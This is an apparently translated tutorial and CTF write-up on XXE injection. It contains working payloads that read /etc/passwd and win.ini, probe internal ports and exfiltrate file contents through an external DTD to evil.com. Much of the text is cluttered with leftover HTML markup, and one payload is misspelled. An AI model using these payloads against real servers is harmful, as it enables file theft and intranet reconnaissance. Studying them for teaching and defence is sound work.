XXE Vulnerability Introduction and Exploitation Techniques

[enhackapt]

0x00 Preface​

This morning I saw an article on a public account that said they found a Starbucks XXE vulnerability and got a bonus. I decided to take a look at this hole in the evening.

XXE is also known as XML External Entity Injection

Simply put, XXE is XML external entity injection. When external entities are allowed to be referenced, malicious content can be constructed to cause arbitrary file reading, system command execution, intranet port detection, and attacks on intranet websites.
For example, if the program you are currently using is PHP, you can set libxml_disable_entity_loader to TRUE to disable external entities, thereby achieving a defensive purpose.

XML Basics
Before introducing the xxe vulnerability, let's review the basics of XML. XML is designed to transmit and store data, with the focus on the content of the data. It separates data from HTML and is an information transmission tool independent of software and hardware.

<br><!ENTITY entity name<span>"entity value"</span>><br>External entity:<br><br><span><span><<span>!ENTITY</span> entity name<span>SYSTEM</span> "<span>URI</span>"></span><br>Parameter entity:<br><br><span><<span>!ENTITY</span> % entity name "entity value"></span><br>or<br><span><<span>!ENTITY</span> % entity name<span>SYSTEM</span> "<span>URI</span>"></span><br>Example demonstration: entities other than parameter entities + internal entities<br><span><span><?</span>xml version=<span>"1.0"</span> encoding=<span>"utf-8"</span><span>?></span></span><br><span><!DOCTYPE a [<br> <!ENTITY name "nMask">]></span><br><span><<span>foo</span>></span><br> <span><<span>value</span>></span>&name;<span></<span>value</span>></span> <br><span></<span>foo</span>></span><br>Example demonstration: parameter entity + external entity<br><span><span><?</span>xml version=<span>"1.0"</span> encoding=<span>"utf-8"</span><span>?></span></span><br><span><!DOCTYPE a [<br> <!ENTITY % name SYSTEM "file:///etc/passwd"><br> %name;<br>]></span><br>Note: %name (parameter entity) is referenced in DTD, while &name (rest of entity) is referenced in XML document. <br><br>Since xxe vulnerability mainly exploits the vulnerability caused by DTD referencing external entities, let's focus on what types of external entities can be referenced. <br><br>External entity<br>An external entity is an entity that uses the <br><br><span><<span>!ENTITY</span> entity name <span>SYSTEM</span> "<span>URI</span>"></span><br>syntax in DTD to reference an external entity rather than an internal entity. So what types of external entities can be written in a URL? <br>The main ones are file, http, https, ftp, etc. Of course, different programs support different ones:<br><br>Example demonstration:<br><br><span><span><?</span>xml version=<span>"1.0"</span> encoding=<span>"utf-8"</span><span>?></span></span><br><span><!DOCTYPE a [ //Define an external name<br> <!ENTITY content SYSTEM "file:///etc/passwd">]></span> // SYSTEM "file:///xxxx" is used to read files<br><span><<span>foo</span>></span> //Define a tag The tag name can be entered arbitrarily, or it can correspond to the external name<br> <span><<span>value</span>></span>&content;<span></<span>value</span>></span> <br><span></<span>foo</span>></span><br><br>Must have Content-Type:application/xml header. If the request header is similar to: Content-Type: application/json, then you can change it to Content-Type: application/xml to see if there is an XML vulnerability.<br></span>

Here is a CTF question. The XXE built by BWAPP seems to have a problem. The result obtained by using the same operation as the article does not match

QCoD1A.pngTitle



address: web.jarvisoj.com:9882

QCoWtg.png



captured the packet and found the following request

QCooXq.pngChange



Content-Type to Content-Type: application/xml, and send the following content to detect whether XXE exists


<span><span><?</span>xml version=<span>"1.0"</span> encoding=<span>"UTF-8"</span><span>?></span></span><br><span><!DOCTYPE sb [<br> <!ENTITY xxe "XXE Test"> //XXE Test is the output content, xxe can be understood as a variable<br> ]></span><br><span><<span>em</span>></span> //Just give it a random name<br> &xxe; //Understand it as a reference to the variable address output<br><span></<span>em</span>></span> <br>

Read file test

QC7EZV.png



reads the flag file

QC72WQ.pngSince



this is a py environment, there is no way to test more


HTTP/1.0 <span>200</span> OK<br><span>Content-Type</span>: text/html; charset=utf-8<br><span>Content-Length</span>: 44<br><span>Server</span>: Werkzeug/0.9.4 Python/2.7.6<br><span>Date</span>: Wed, 27 Nov 2019 15:37:08 GMT<br><br><span><span><em></span><br> <span>CTF</span>{XxE_15_n0T_S7range_Enough}<br><br><span></em></span><br></span>

It is directly listed here that


the ML document is parsed using PHP, so you can also use the php:<span>//filter protocol to read it. </span><br><br><?xml version=<span>"1.0"</span> encoding=<span>"utf-8"</span>?><br><span><span><!DOCTYPE root [<br><!ENTITY content SYSTEM "php://filter/resource=c:/windows/win.ini"><br>]></span><br><span><<span>root</span>></span><span><<span>foo</span>></span>&content;<span></<span>foo</span>></span><span></<span>root</span>></span><br><br>Port Scanning<br>There are two ways to load external DTDs, one is private and the other is public. <br><br>Private type DTD loading: <br><br><span><<span>!ENTITY</span> <span>private_dtd</span> <span>SYSTEM</span> "<span>DTD_location</span>"></span><br><br>Public type DTD loading: <br><br><span><<span>!ENTITY</span> <span>public_dtd</span> <span>PUBLIC</span> "<span>DTD_name</span>" "<span>DTD_location</span>"></span><br>When public type DTD is loaded, DTD_name will be used to search first. If it cannot be found, DTD_location will be used to find this public DTD. DTD_location can be used for intranet detection under certain circumstances. <br><br><span><span><?</span>xml version=<span>"1.0"</span> encoding=<span>"utf-8"</span><span>?></span></span><br><span><!DOCTYPE root [<br> <!ENTITY portscan SYSTEM " http://localhost:3389 "><br>]></span><br><span><<span>root</span>></span><span><<span>foo</span>></span>& ;portscan;<span></<span>foo</span>></span><span></<span>root</span>></span><br><br><br>blind xxe vulnerability:<br>For traditional XXE, attackers can use XXE vulnerabilities to read server-side files only when the server has an echo or an error. If there is no echo, the Blind XXE vulnerability can be used to build an out-of-band channel to extract data. <br>Use DTD for data echo<br>Sometimes there is no echo when reading a file. In this case, the characteristics of the DTD parameter entity can be used to splice the file content into the URL to achieve the effect of reading the file. <br><br> <span><span><?</span>xml version=<span>"1.0"</span> encoding=<span>"utf-8"</span><span>?></span></span><br> <span><!DOCTYPE root[ <br> <!ENTITY % file SYSTEM "php://fileter/convert.base64-encode/resource=c:/windows/win.ini"> <br> <!ENTITY % dtd SYSTEM " http://192.168.1.100:8000/evil.dtd "> <br> %dtd; <br> %send;]></span><br> <span><<span>root</span>></span><span></<span>root</span>></span><br>evil.dtd<br><br> <span><<span>!ENTITY</span> % <span>payload</span> "<!<span>ENTITY</span> &#<span>x25</span>; <span>send</span> <span>SYSTEM</span> '<span>http:</span>//<span>evil.com</span>/?<span>content</span>=<span>%file;</span>'></span>"><br> %payload;<br>In evil.dtd, concatenate the contents of the %file entity to the URL, and then use tools such as burp to view the URL request to get the content we need</span>